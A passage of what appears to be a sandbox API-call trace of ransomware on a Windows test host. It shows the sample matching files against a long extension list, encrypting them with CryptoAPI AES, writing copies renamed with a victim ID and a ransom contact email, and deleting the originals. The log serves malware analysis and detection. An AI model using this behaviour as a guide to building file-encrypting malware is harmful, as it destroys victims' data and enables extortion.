.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0192.528] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0192.529] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0192.529] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0192.535] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x1132b, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x1132b, lpOverlapped=0x0) returned 1
	[0192.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.540] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcba18) returned 1
	[0192.543] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.543] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0192.543] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.543] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0192.544] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.544] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb8f30) returned 1
	[0192.544] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.544] CryptEncrypt (in: hKey=0xfb8f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x1132b, dwBufLen=0x1132b | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x11330) returned 1
	[0192.547] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.548] RtlMoveMemory (in: Destination=0xfee4b8, Source=0xfdd180, Length=0x1132b | out: Destination=0xfee4b8) 
	[0192.548] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.548] CryptEncrypt (in: hKey=0xfb8f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfee4b8*, pdwDataLen=0x18aefc*=0x1132b, dwBufLen=0x11330 | out: pbData=0xfee4b8*, pdwDataLen=0x18aefc*=0x11330) returned 1
	[0192.548] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.549] CryptDestroyKey (hKey=0xfb8f30) returned 1
	[0192.549] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.549] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0192.585] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.586] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0192.586] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.586] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0192.587] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.587] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0192.590] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 98
	[0192.590] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0192.591] WriteFile (in: hFile=0x388, lpBuffer=0xfee4b8*, nNumberOfBytesToWrite=0x11330, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfee4b8*, lpNumberOfBytesWritten=0x18b358*=0x11330, lpOverlapped=0x0) returned 1
	[0192.597] CloseHandle (hObject=0x388) returned 1
	[0192.598] CloseHandle (hObject=0x2c0) returned 1
	[0192.598] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3")) returned 1
	[0192.604] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3")) returned 0
	[0192.605] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60343cc0, ftCreationTime.dwHighDateTime=0x1d97442, ftLastAccessTime.dwLowDateTime=0x33bbf590, ftLastAccessTime.dwHighDateTime=0x1d9768e, ftLastWriteTime.dwLowDateTime=0x33bbf590, ftLastWriteTime.dwHighDateTime=0x1d9768e, nFileSizeHigh=0x0, nFileSizeLow=0x45c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="qFfScMksuU.wav", cAlternateFileName="QFFSCM~1.WAV")) returned 1
	[0192.605] lstrcmpW (lpString1="qFfScMksuU.wav", lpString2="..") returned 1
	[0192.605] lstrcmpW (lpString1="qFfScMksuU.wav", lpString2=".") returned 1
	[0192.605] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\"
	[0192.605] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\", lpString2="qFfScMksuU.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\qFfScMksuU.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\qFfScMksuU.wav"
	[0192.605] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\qFfScMksuU.wav") returned 59
	[0192.605] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0192.605] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\qFfScMksuU.wav", cchLength=0x3b | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav") returned 0x3b
	[0192.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.606] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav", lpSrch="help_decrypt_your_files") returned 0x0
	[0192.606] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav"
	[0192.606] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\qffscmksuu.wav") returned 59
	[0192.606] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.607] StrStrW (lpFirst=".wav", lpSrch=".") returned=".wav"
	[0192.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.607] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".wav") returned=".wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgm